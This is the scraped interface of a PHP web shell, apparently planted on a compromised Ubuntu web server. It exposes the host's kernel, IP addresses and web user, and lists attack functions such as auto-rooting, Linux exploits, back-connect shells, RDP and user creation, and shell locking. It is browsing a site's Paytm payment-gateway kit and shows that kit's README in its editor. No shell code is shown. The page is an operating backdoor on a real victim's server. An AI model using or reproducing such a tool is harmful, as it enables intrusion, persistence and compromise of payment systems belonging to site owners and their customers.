Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.118.144.239
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
kus /
parikshamitra /
admin /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
PaytmKit
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
.gitattributes
378
B
-rwxr-xr-x
README.md
1.35
KB
-rwxr-xr-x
TxnStatus.php
2.11
KB
-rwxr-xr-x
TxnTest.php
1.75
KB
-rwxr-xr-x
pgRedirect.php
2.27
KB
-rwxr-xr-x
pgResponse.php
5.06
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : README.md
# How to install the sample kit on a web server: 1. Copy PaytmKit folder in document root of your server (like /var/www/html) 2. Open config_paytm.php file from the PaytmKit/lib folder and update the below constant values - PAYTM_MERCHANT_KEY – Can be downloaded from the Paytm portal. One time downloadable - PAYTM_MERCHANT_MID - MID (Merchant ID) can be collected from Paytm team - PAYTM_MERCHANT_WEBSITE - Website name can be collected from Paytm team 3. PaytmKit folder is having following files: - TxnTest.php – Testing transaction through Paytm gateway. - pgRedirect.php – This file has the logic of checksum generation and passing all required parameters to Paytm PG. - pgResponse.php – This file has the logic for processing PG response after the transaction processing. - TxnStatus.php – Testing Status Query API # For Offline(Wallet Api) Checksum Utility below are the methods: 1. getChecksumFromString : For generating the checksum 2. verifychecksum_eFromStr : For verifing the checksum # To generate refund checksum in PHP : 1. Create an array with key value pair of following paytm parameters (MID, ORDERID, TXNTYPE, REFUNDAMOUNT, TXNID, REFID) 2. To generate checksum, call the following method. This function returns the checksum as a string. getRefundChecksumFromArray($arrayList, $key, $sort=1)
Close